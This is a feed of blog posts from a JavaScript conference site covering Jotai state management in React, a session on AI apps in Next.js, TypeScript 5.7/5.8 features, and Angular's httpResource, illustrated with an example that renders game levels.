Jotai provides three different hook functions for accessing the atom from a component. useAtom returns a tuple for read and write access. This tuple is similar in structure to the tuple returned by React’s useState hook. useAtomValue returns only the first part of the tuple, giving you read-only access to the atom. The counterpart is the useSetAtom function, which gives you the setter function for the atom. You can already achieve a lot with this structure, but Jotai also lets you combine atoms. To implement the shopping cart state, you create three atoms in total. One represents the shopping cart, one is for adding products, and one is for loading data from the server. Listing 9 shows the implementation details.

Listing 9: Implementing the atoms

import { atom } from 'jotai';
import { CartItem } from './types/Cart';

const cartItemsAtom = atom<CartItem[]>([]);

async function saveCartToServer(cartItems: CartItem[]): Promise<void> {
  await fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

const addToCartAtom = atom(null, async (get, set, item: CartItem) => {
  const currentCart = get(cartItemsAtom);
  const existingItemIndex = currentCart.findIndex(
    (cartItem) => cartItem.id === item.id
  );

  let updatedCart: CartItem[];
  if (existingItemIndex !== -1) {
    updatedCart = [...currentCart];
    updatedCart[existingItemIndex] = item;
  } else {
    updatedCart = [...currentCart, item];
  }

  set(cartItemsAtom, updatedCart);

  await saveCartToServer(updatedCart);
});

const loadCartAtom = atom(null, async (_get, set) => {
  const response = await fetch('http://localhost:3001/cart');
  const data: CartItem[] = (await response.json())['items'];
  set(cartItemsAtom, data);
});

export { cartItemsAtom, addToCartAtom, loadCartAtom };

You implement your application’s atoms separately from your components. For the cartItemsAtom, call the atom function with an empty array and define the type as a CartItem array. When implementing the business logic, also use the atom function, but pass the value null as the first argument and a function as the second. This creates a derived atom that only allows write access. In the function, you have access to the get and set functions. You can use these to access another atom – in this case, the cartItemsAtom. You can also support additional parameters that are passed when the function is called. For write access with set, pass a reference to the atom and then the updated value. Since the function can be asynchronous, you can easily integrate a side effect like loading data from the server or writing the updated shopping cart. The atoms are integrated into the application components using the Jotai hook functions. Listing 10 shows how this works in the ListItem component example.

Listing 10: Integration in the ListItem Component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useAtom, useAtomValue, useSetAtom } from 'jotai';
import { cartItemsAtom, addToCartAtom } from './cart.atom';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const cartItems = useAtomValue(cartItemsAtom);
  const addToCart = useSetAtom(addToCartAtom);

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

For read access, you can use the useAtomValue function directly, since all write operations go through the derived atoms; for those, you use useSetAtom. To add a product to the shopping cart, simply call the addToCart function with the new shopping cart item. Jotai takes care of everything else, including updating all components affected by the atom change.
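Derived atoms are not limited to write access. As a sketch of the combination idea (assuming the cartItemsAtom from Listing 9; the name cartCountAtom is illustrative, not part of the example application), a read-only derived atom can compute the total quantity in the cart:

```typescript
import { atom } from 'jotai';
import { cartItemsAtom } from './cart.atom';

// Read-only derived atom: the read function receives `get` and is
// re-evaluated whenever cartItemsAtom changes.
export const cartCountAtom = atom((get) =>
  get(cartItemsAtom).reduce((sum, item) => sum + item.quantity, 0)
);
```

A component can then display the total via useAtomValue(cartCountAtom) without re-implementing the calculation in every consumer.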

Conclusion

In this article, you learned about different approaches to state management in a React application. We focused on lightweight approaches that don’t dictate your application’s entire architecture. The first approach used React’s very own interfaces – state or reducers and context. This gives you the maximum amount of freedom and flexibility in your implementation, but you must also take care of all the implementation details yourself.

If you’re willing to sacrifice some of this flexibility and accept an extra dependency in your application, libraries like Zustand or Jotai are a helpful alternative. Both libraries take different approaches. Zustand offers a compact solution that concentrates both the structure and logic in one structure. Jotai, on the other hand, works with smaller units and lets you derive or combine these units, making your application more flexible and individual parts easier to exchange. Ultimately, the solution you choose depends upon the use case and your personal preferences.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman https://javascript-conference.com/blog/ai-nextjs-nir-kaufman-workshop/ Wed, 09 Jul 2025 16:26:32 +0000 https://javascript-conference.com/?p=108186 In today’s fast-evolving web development landscape, integrating AI into your apps isn't just a trend—it's becoming a necessity. In this hands-on session, Nir Kaufman walks developers through building AI-driven applications using the Next.js framework. Whether you're exploring generative AI, large language models (LLMs), or building smarter interfaces, this session provides the perfect foundation.

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
The session dives deep into practical ways to incorporate AI into web applications using Next.js, covering everything from LLM fundamentals to real-world coding demos.

1. Understanding AI and Large Language Models (LLMs)

The session begins with an overview of how AI—especially generative AI models—can enhance modern web applications. Nir explains how LLMs understand and generate content based on user queries, opening the door to intelligent, context-aware features.

2. Integrating AI into Next.js

Participants learn how to connect their Next.js projects with AI APIs, fetching and utilizing model-generated data to enhance app functionality. This includes server-side and client-side integration techniques that ensure seamless performance.

3. Creating Intelligent, Adaptive Interfaces

One key highlight is building UIs that dynamically respond to user behavior. Nir demonstrates how to use AI-generated data to create content and interfaces that feel personalized and highly interactive.

4. Hands-On Coding Examples

Throughout the session, attendees follow along with real-world code samples. From generating UI components based on prompts to managing complex application state with AI logic, each example is designed for immediate application.

5. Best Practices for AI Integration

  • Performance: Use caching and smart data-fetching strategies to avoid bottlenecks.
  • Security: Keep API keys secure and handle user data responsibly.
  • Scalability: Design systems that can scale with increasing AI workloads.

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Key Takeaways

  • AI enhances—rather than replaces—developer capabilities.
  • Dynamic user experiences are possible with personalized content generation.
  • Efficient state management is crucial in AI-enhanced UIs.
  • Security and privacy must be top priorities when dealing with user data and AI APIs.

Conclusion

This session equips developers with the tools and mindset to begin building powerful, AI-driven web applications using Next.js. Nir Kaufman’s practical approach bridges theory with real-world implementation, making it easier than ever to bring AI into your development stack.

If you’re ready to explore AI-powered features and elevate your web applications, this session is a must-watch. Watch the full video above and start turning your ideas into intelligent applications today.


The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
What’s New in TypeScript 5.7/5.8 https://javascript-conference.com/blog/typescript-5-7-5-8-features-ecmascript-direct-execution/ Thu, 26 Jun 2025 12:29:50 +0000 https://javascript-conference.com/?p=108154 TypeScript is widely used today for developing modern web applications because it offers several advantages over a pure JavaScript approach. For example, TypeScript's static type system allows the written program code to be checked for errors during development and build time. This is also known as static code analysis and contributes to the long-term maintainability of the project. The two latest versions, TypeScript 5.7 from November 2024 and 5.8 from March 2025, bring several improvements and new features, which we will explore below.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Improved Type Safety

TypeScript improves type safety in several areas. Variables that are never initialized are now detected more reliably: if a variable is declared but never assigned a value, the compiler reports an error. In certain situations, however, TypeScript cannot determine this unambiguously. Listing 1 shows such a situation: within the function definition of “printResult()”, TypeScript cannot clearly determine which path is taken in the outer function. Therefore, TypeScript makes the “optimistic” assumption that the variable will be initialized.

Listing 1: Optimistic type check in different functional contexts

function foo() {
  let result: number;
  if (myCondition()) {
    result = myCalculation();
  } else {
    const temporaryWork = myOtherCalculation();
    // Forgot to assign 'result'
  }
  printResult();
  function printResult() {
    console.log(result); // no compiler error
  }
}

With version 5.7, this situation has been improved, at least in cases where no conditions are used. In Listing 2, the variable “result” is not assigned, but this is also recognized within the function “printResult()” and now results in a compiler error.

Listing 2: Optimistic type check in different functional contexts

function foo() {
  let result: number;
  // Further logic in which 'result' is never assigned

  printResult();
  function printResult() {
    console.log(result);
    // Variable 'result' is used before being assigned.(2454)
  }
}

Another type check ensures that methods with non-literal (“computed”) property names are consistently treated as index signatures in classes. Listing 3 shows this using a method declared with a computed property name.

Listing 3: Index signatures for classes

declare const sym: symbol;
export class MyClass {
  [sym]() { return 1; }
}
// Is interpreted as
export class MyClass { [x: symbol]: () => number; }

Previously, this method was ignored by the type system. With 5.7, it now appears as an index signature ([x: symbol] signature). This harmonizes the behavior with object literals and can be particularly useful for generic APIs.

Last but not least, version 5.7 introduces a stricter error message under the “noImplicitAny” compiler option. When this option is enabled, function definitions that do not declare an explicit return type are now checked more thoroughly. Functions without an annotated return type are often arrow functions used as callback handlers, for example in promise chains: “catch(() => null)”. If such a handler implicitly returns “null” or “undefined”, the error “TS7011: Function expression, which lacks return-type annotation, implicitly has an ‘any’ return type” is now reported. Typing is therefore stricter here, which helps avoid runtime errors.

Latest ECMAScript and Node.js Support

With TypeScript 5.7, ECMAScript 2024 can now be used as the compile target (e.g., via the compiler flag --target es2024). This is particularly useful for staying up to date and gaining access to the latest language features and APIs. New APIs include “Object.groupBy()” and “Map.groupBy()”, which group the elements of an iterable into an object or a Map, respectively. Listing 4 shows this using an array called “inventory” containing various supermarket products. The array is to be divided into two groups: products that are still available (“sufficient”) and products that need to be restocked (“restock”). “Object.groupBy()” is passed the array to be grouped and a function that returns, for each item, the group it belongs to. The return value (here the variable “result”) is an object that contains the different groups as properties. Each group is itself an array (see the console.log outputs in Listing 4). If a group contains no entries, its property is “undefined”.

Listing 4: Grouping arrays with Object.groupBy()

const inventory = [
 { name: "asparagus", type: "vegetables", quantity: 9 },
 { name: "bananas", type: "fruit", quantity: 5 },
 { name: "cherries", type: "fruit", quantity: 12 }
];

const result = Object.groupBy(inventory, ({ quantity }) =>
 quantity < 10 ? "restock" : "sufficient",
);

console.log(result.restock);
// [{ name: "asparagus", type: "vegetables", quantity: 9 },
//  { name: "bananas", type: "fruit", quantity: 5 }]

console.log(result.sufficient);
// [{ name: "cherries", type: "fruit", quantity: 12 }]

If more complex calculations are performed, or if WASM, multiple workers, and correspondingly complex setups are used, the TypedArray classes (e.g., “Uint8Array”), “ArrayBuffer”, and “SharedArrayBuffer” come into play. In ES2024, the length of an ArrayBuffer can be changed (“resize()”), while a SharedArrayBuffer can only grow (“grow()”), so the two buffer variants have slightly different APIs. However, the TypedArray classes always use a buffer under the hood. To accommodate these API differences, the common supertype “ArrayBufferLike” is used as the default. If a specific implementation is to be used, the buffer type can now be specified explicitly, as all TypedArray classes are now generic over the underlying buffer type. Listing 5 illustrates this: in the case of “Uint8Array”, “view” has access to the correct buffer variant, “SharedArrayBuffer”.

Listing 5: TypedArrays with a generic buffer type

// New: TypedArray with a generic ArrayBuffer type
interface Uint8Array<T extends ArrayBufferLike = ArrayBufferLike> { /* ... */ }

// Usage with a concrete type: here SharedArrayBuffer
const buffer = new SharedArrayBuffer(16, { maxByteLength: 1024 });
const view = new Uint8Array(buffer);

view.buffer.grow(512); // `grow` only exists on SharedArrayBuffer

Directly Executable TypeScript

In addition to the new features, TypeScript now better supports tools that execute TypeScript files directly, without a compile step (e.g., “ts-node”, “tsx”, or Node 23.x with “--experimental-strip-types”). Direct execution can speed up development by skipping the build/compile task between writing and running code and “catching up” on it later. This becomes possible when relative imports are adjusted. Normally, imports have no file extension (see Listing 6), so they do not have to differ between the source code and the compiled result. Executing a file directly without translation, however, requires the “.ts” extension (Listing 6), and such an import usually results in a compiler error. With the new compiler option “--rewriteRelativeImportExtensions”, all TypeScript extensions are automatically rewritten (from .ts/.tsx/.mts/.cts to .js/.jsx/.mjs/.cjs). On the one hand, this provides better support for direct execution; on the other hand, the same TypeScript files can still go through the normal TypeScript build process. This is important, for example, for library authors who want to test their files quickly without a compile step but still need a real TypeScript build before publishing.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Listing 6: Import with .ts extension

import {Demo} from './bar';    // <- standard import
import {Demo} from './bar.ts'; // <- required for direct execution
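In tsconfig.json, the option is enabled like any other compiler flag; a minimal sketch (only the flag itself is taken from the article, the surrounding file is illustrative):

```json
{
  "compilerOptions": {
    "rewriteRelativeImportExtensions": true
  }
}
```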

If the Node.js option “--experimental-strip-types” is used to execute TypeScript directly, care must be taken that only TypeScript constructs that are easy for Node.js to remove (strip) are used. To better support this use case, the new compiler option “--erasableSyntaxOnly” has been added in 5.8. This option prohibits TypeScript-only features such as enums, namespaces, parameter properties (see also Listing 7), and special import forms, and marks them as compiler errors.

Listing 7: Constructs prohibited under “--erasableSyntaxOnly”

// error: namespace with runtime code
namespace container {
}

class Point {
  // error: parameter properties
  constructor(public x: number, public y: number) { }
}

// error: enum declaration
enum Direction {
  Up,
  Down
}

Further Improvements

The TypeScript team wants to make the development process as pleasant as possible for all developers, and it uses every new option available under the hood to do so. Node.js 22, for example, introduced a caching API (“module.enableCompileCache()”), which TypeScript now uses to save recurring parsing and compilation costs. In benchmarks, running tsc was about two to three times faster than before.

By default, the compiler checks whether special “@typescript/lib-*” packages are installed. These packages can be used to replace the standard TypeScript libraries in order to customize the behavior of what are otherwise native TypeScript APIs. Previously, this check was always performed, even if no such library packages were used, which can mean unnecessary overhead for many files or in large projects. With the new compiler option “--libReplacement=false”, this behavior can be disabled, which can improve initialization time, especially in very large projects and monorepos.

Support for developer tools is also an important task for TypeScript, so there have been updates to project and editor support as well. When an editor that uses the TS language server loads a file, it searches for the corresponding “tsconfig.json”. Previously, it stopped at the first match, which in monorepo-like structures often led the editor to assign the wrong configuration to a file and thus fail to offer correct developer support. With the new TypeScript versions, the search now continues further up the directory tree if necessary to find a suitable configuration. For example, in Listing 8, the test file “foo-test.ts” is now correctly used with the configuration “projekt/src/tsconfig.test.json” and not accidentally with the main configuration “projekt/tsconfig.json”. This makes it easier to work in “workspaces” or composite setups with multiple subprojects.

Listing 8: Repo structure with multiple TSConfigs

projekt/
├── src/
│   ├── tsconfig.json
│   ├── tsconfig.test.json
│   ├── foo.ts
│   └── foo-test.ts
└── tsconfig.json

Conclusion

TypeScript 5.7 and 5.8 offer a variety of direct and indirect improvements for developers. In particular, they increase type safety (better errors for uninitialized variables, stricter return checks) and bring the language up to date with ECMAScript. At the same time, they improve the developer experience through faster build processes (compile caching, optimized checks), extended Node.js support, and more flexible configuration for monorepos.

The TypeScript team is already working on many large and small improvements for the future. TypeScript 5.9 is in the starting blocks and is scheduled for release at the end of July. In addition, a major change is planned: the TypeScript compiler is to be completely rewritten in Go for version 7. Initial tests have shown that the new Go-based compiler can achieve up to 10 times faster builds for your own projects.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Exploring httpResource in Angular 19.2 https://javascript-conference.com/blog/exploring-httpresource-angular-19/ Mon, 19 May 2025 11:30:20 +0000 https://javascript-conference.com/?p=107841 Angular 19.2 introduced the experimental httpResource feature, streamlining HTTP data loading within the reactive flow of applications. By leveraging signals, it simplifies asynchronous data fetching, providing developers with a more streamlined approach to handling HTTP requests. With Angular 20 on the horizon, this feature will evolve further, offering even more power for managing data in reactive applications. Let’s explore how to leverage httpResource to enhance your applications.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
As an example, we have a simple application that scrolls through levels in the style of the game Super Mario. Each level consists of tiles that are available in four different styles: overworld, underground, underwater, and castle. In our implementation, users can switch freely between these styles. Figure 1 shows the first level in overworld style, while Figure 2 shows the same level in underground style.

Figure 1: Level 1 in overworld style

Figure 2: Level 1 in the underground style

The LevelComponent in the example application takes care of loading the level files (JSON) and the tiles for drawing the levels using an httpResource. To render and animate the levels, the example relies on a very simple engine that is included with the source code but treated as a black box in this article.

HttpClient under the hood enables the use of interceptors

At its core, the new httpResource currently uses the good old HttpClient. Therefore, the application has to provide this service, which is usually done by calling provideHttpClient during bootstrapping. As a consequence, the httpResource also automatically picks up the registered HttpInterceptors.
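A typical wiring during bootstrapping might look like the following sketch (authInterceptor is a hypothetical interceptor; provideHttpClient and withInterceptors come from Angular’s HTTP package):

```typescript
import { bootstrapApplication } from '@angular/platform-browser';
import { provideHttpClient, withInterceptors } from '@angular/common/http';
import { AppComponent } from './app/app.component';
import { authInterceptor } from './app/auth.interceptor'; // hypothetical

bootstrapApplication(AppComponent, {
  providers: [
    // Because httpResource delegates to HttpClient, interceptors
    // registered here also apply to its requests
    provideHttpClient(withInterceptors([authInterceptor])),
  ],
});
```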

However, the HttpClient is just an implementation detail that Angular may eventually replace with a different implementation.

Level files

In our example, the different levels are described by JSON files, which define which tiles are to be displayed at which coordinates (Listing 1).

Listing 1:

{
  "levelId": 1,
  "backgroundColor": "#9494ff",
  "items": [
    { "tileKey": "floor", "col": 0, "row": 13, [...] },
    { "tileKey": "cloud", "col": 12, "row": 1, [...] },
    [...]
  ]
}

These coordinates define positions within a matrix of 16×16-pixel blocks. Alongside the level files, an overview.json file provides the names of the available levels.

LevelLoader takes care of loading these files. To do this, it uses the new httpResource (Listing 2).

Listing 2:

@Injectable({ providedIn: 'root' })
export class LevelLoader {
  getLevelOverviewResource(): HttpResourceRef<LevelOverview> {
    return httpResource<LevelOverview>('/levels/overview.json', {
      defaultValue: initLevelOverview,
    });
  }

  getLevelResource(levelKey: () => string | undefined): HttpResourceRef<Level> {
    return httpResource<Level>(() => !levelKey() ? undefined : `/levels/${levelKey()}.json`, {
      defaultValue: initLevel,
    });
  }

 [...]
}

The first parameter passed to httpResource represents the respective URL. The second optional parameter accepts an object with further options. This object allows the definition of a default value that is used before the resource has been loaded.

The getLevelResource method expects a signal with a levelKey, from which the service derives the name of the desired level file. This read-only signal is an abstraction of the type () => string | undefined.

The URL passed from getLevelResource to httpResource is a lambda expression that the resource automatically reevaluates when the levelKey signal changes. In the background, httpResource uses it to create a computed signal that acts as a trigger: every time this trigger changes, the resource loads the URL.

To prevent the httpResource from being triggered, this lambda expression must return the value undefined. This way, the loading can be delayed until the levelKey is available.

Further options with HttpResourceRequest

To get more control over the outgoing HTTP request, the caller can pass an HttpResourceRequest instead of a URL (Listing 3).

Listing 3:

getLevelResource(levelKey: () => string) {
  return httpResource<Level>(
    () => ({
      url: `/levels/${levelKey()}.json`,
      method: "GET",
      headers: {
        accept: "application/json",
      },
      params: {
        levelId: levelKey(),
      },
      reportProgress: false,
      body: null,
      transferCache: false,
      withCredentials: false,
    }),
    { defaultValue: initLevel }
  );
}

This HttpResourceRequest can also be represented by a lambda expression, from which httpResource internally constructs a computed signal.

It is important to note that although the httpResource offers the option to specify HTTP methods (HTTP verbs) beyond GET and a body that is transferred as a payload, it is only intended for retrieving data. These options allow you to integrate web APIs that do not adhere to the semantics of HTTP verbs. By default, the httpResource converts the passed body to JSON.

With the reportProgress option, the caller can request information about the progress of the current operation. This is useful when downloading large files. I will discuss this in more detail below.

Analyzing and validating the received data

By default, the httpResource expects data in the form of JSON that matches the specified type parameter. In addition, a type assertion is used to ensure that TypeScript assumes the presence of correct types. However, it is possible to intervene in this process to provide custom logic for validating the received raw value and converting it to the desired type. To do this, the caller defines a function using the map property in the options object (Listing 4).

Listing 4:

getLevelResourceAlternative(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    map: (raw) => {
      return toLevel(raw);
    },
  });
}

The httpResource converts the received JSON into an object of type unknown and passes it to map. In our example, a simple self-written function toLevel is used. In addition, map also allows the integration of libraries such as Zod, which performs schema validation.

Loading data other than JSON

By default, httpResource expects a JSON document, which it converts into a JavaScript object. However, it also offers other methods that provide other forms of representation:

  • httpResource.text returns text
  • httpResource.blob returns the retrieved data as a blob
  • httpResource.arrayBuffer returns the retrieved data as an ArrayBuffer

To demonstrate these possibilities, the example discussed here requests an image with all possible tiles as a blob. From this blob, it derives the tiles required for the selected level style. Figure 3 shows a section of this tilemap and illustrates that the application can switch between the individual styles by applying a horizontal or vertical offset.

Figure 3: Section of the tilemap used in the example (Source)

A TilesMapLoader delegates to httpResource.blob to load the tilemap (Listing 5).

Listing 5:

@Injectable({ providedIn: "root" })
export class TilesMapLoader {
  getTilesMapResource(): HttpResourceRef<Blob | undefined> {
    return httpResource.blob({
      url: "/tiles.png",
      reportProgress: true,
    });
  }
}

This resource also requests progress information, which the example displays to the left of the drop-down fields.

Putting it all together: reactive flow

The httpResources described in the last sections can now be combined into the reactive graph of the application (Figure 4).

Figure 4: Reactive flow of ngMario

The signals levelKey, style, and animation represent the user input. The first two correspond to the drop-down fields at the top of the application. The animation signal contains a Boolean that indicates whether the animation was started by clicking the Toggle Animation button (see screenshots above).

The tilesResource is a classic resource that derives the individual tiles for the selected style from the tilemap. To do this, it essentially delegates to a function of the game engine, which is treated as a black box here.

The rendering is triggered by an effect, since we cannot draw the level directly using data binding. The effect draws or animates the level on a canvas, which the application retrieves as a signal-based viewChild. Angular calls the effect whenever the level (provided by the levelResource), the style, the animation flag, or the canvas changes.

The tilesMapProgress signal uses the progress information provided by the tilesMapResource to indicate how much of the tilemap has already been downloaded. To load the list of available levels, the example uses a levelOverviewResource that is not directly connected to the reactive graph discussed so far.

Listing 6 shows the implementation of this reactive flow in the form of fields of the LevelComponent.

Listing 6:

export class LevelComponent implements OnDestroy {
  private tilesMapLoader = inject(TilesMapLoader);
  private levelLoader = inject(LevelLoader);

  canvas = viewChild<ElementRef<HTMLCanvasElement>>("canvas");

  levelKey = linkedSignal<string | undefined>(() => this.getFirstLevelKey());
  style = signal<Style>("overworld");
  animation = signal(false);

  tilesMapResource = this.tilesMapLoader.getTilesMapResource();
  levelResource = this.levelLoader.getLevelResource(this.levelKey);
  levelOverviewResource = this.levelLoader.getLevelOverviewResource();

  tilesResource = createTilesResource(this.tilesMapResource, this.style);

  tilesMapProgress = computed(() =>
    calcProgress(this.tilesMapResource.progress())
  );

  constructor() {
    [...]
    effect(() => {
      this.render();
    });
  }

  reload() {
    this.tilesMapResource.reload();
    this.levelResource.reload();
  }

  private getFirstLevelKey(): string | undefined {
    return this.levelOverviewResource.value()?.levels?.[0]?.levelKey;
  }

  [...]
}

Using a linkedSignal for the levelKey allows us to use the first level as the default value as soon as the list of levels has been loaded. The getFirstLevelKey helper returns this from the levelOverviewResource.

The effect retrieves the named values from the respective signals and passes them to the engine’s animateLevel or renderLevel function (Listing 7).

Listing 7:

private render() {
  const tiles = this.tilesResource.value();
  const level = this.levelResource.value();
  const canvas = this.canvas()?.nativeElement;
  const animation = this.animation();

  if (!tiles || !canvas) {
    return;
  }

  if (animation) {
    animateLevel({
      canvas,
      level,
      tiles,
    });
  } else {
    renderLevel({
      canvas,
      level,
      tiles,
    });
  }
}

Resources and missing parameters

The tilesResource shown in the diagram simply delegates to the asynchronous extractTiles function, which the engine also provides (Listing 8).

Listing 8:

function createTilesResource(
  tilesMapResource: HttpResourceRef<Blob | undefined>,
  style: () => Style
) {
  const request = computed(() => {
    // Read the signal inside computed() so the request stays reactive
    const tilesMap = tilesMapResource.value();

    // undefined prevents the resource from being triggered
    return !tilesMap
      ? undefined
      : {
          tilesMap,
          style: style(),
        };
  });

  return resource({
    request,
    loader: (params) => {
      const { tilesMap, style } = params.request!;
      return extractTiles(tilesMap, style);
    },
  });
}

This simple resource contains an interesting detail: before the tilemap is loaded, the tilesMapResource has the value undefined. However, we cannot call extractTiles without a tilesMap. The request signal takes this into account: it returns undefined if no tilesMap is available yet, so the resource does not trigger its loader.

Displaying Progress

The tilesMapResource was configured above to provide information about the download progress via its progress signal. A computed signal in the LevelComponent projects it into a string for display (Listing 9).

Listing 9:

function calcProgress(progress: HttpProgressEvent | undefined): string {
  if (!progress) {
    return "-";
  }

  if (progress.total) {
    const percent = Math.round((progress.loaded / progress.total) * 100);
    return percent + "%";
  }

  const kb = Math.round(progress.loaded / 1024);
  return kb + " KB";
}

If the server reports the file size, this function calculates the percentage already downloaded. Otherwise, it simply returns the number of kilobytes received so far. Before the download starts, there is no progress information at all; in that case, a hyphen is displayed.
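As a quick sanity check, here is calcProgress applied to typical progress events. The function is repeated with a minimal structural stand-in for HttpProgressEvent so the snippet is self-contained:

```typescript
// Minimal structural stand-in for the HttpProgressEvent fields used here.
interface ProgressLike {
  loaded: number;
  total?: number;
}

function calcProgress(progress: ProgressLike | undefined): string {
  if (!progress) {
    return '-';
  }
  if (progress.total) {
    const percent = Math.round((progress.loaded / progress.total) * 100);
    return percent + '%';
  }
  const kb = Math.round(progress.loaded / 1024);
  return kb + ' KB';
}

console.log(calcProgress(undefined));                    // "-"
console.log(calcProgress({ loaded: 512, total: 2048 })); // "25%"
console.log(calcProgress({ loaded: 10240 }));            // "10 KB"
```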

To try this function out, it makes sense to throttle the network connection in the browser’s developer tools and press the application’s reload button so that the resources fetch their data again.

Status, header, error, and more

In case the application needs the status code or the headers of the HTTP response, the httpResource provides the corresponding signals:

console.log(this.levelOverviewResource.status());
console.log(this.levelOverviewResource.statusCode());
console.log(this.levelOverviewResource.headers()?.keys());

In addition, the httpResource provides everything known from ordinary resources, including an error signal with information about any errors that occurred, as well as the option to update the value, which is available as a local working copy.
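Sketched usage of these additional capabilities; the emptyLevel fallback is a hypothetical value introduced here for illustration:

```typescript
// Log any error reported by the resource:
const error = this.levelResource.error();
if (error) {
  console.error('Loading the level failed', error);
}

// Replace the local working copy without contacting the server:
this.levelResource.set(emptyLevel);
```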

Conclusion

The new httpResource is another building block that complements Angular’s new signal story. It allows data to be loaded within the reactive graph. Currently, it uses the HttpClient as an implementation detail, which may be replaced by another solution at a later date.

While the HTTP resource also allows data to be retrieved using HTTP verbs other than GET, it is not designed to write data back to the server. That task still needs to be done the conventional way, for instance via the HttpClient.
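A minimal sketch of such a conventional write-back, assuming a hypothetical /api/levels endpoint; the service name is an assumption as well:

```typescript
import { inject, Injectable } from '@angular/core';
import { HttpClient } from '@angular/common/http';

@Injectable({ providedIn: 'root' })
export class LevelStore {
  private readonly http = inject(HttpClient);

  // Writing data back still goes through the HttpClient directly;
  // httpResource remains responsible only for reading.
  saveLevel(level: unknown) {
    return this.http.post('/api/levels', level);
  }
}
```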

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.
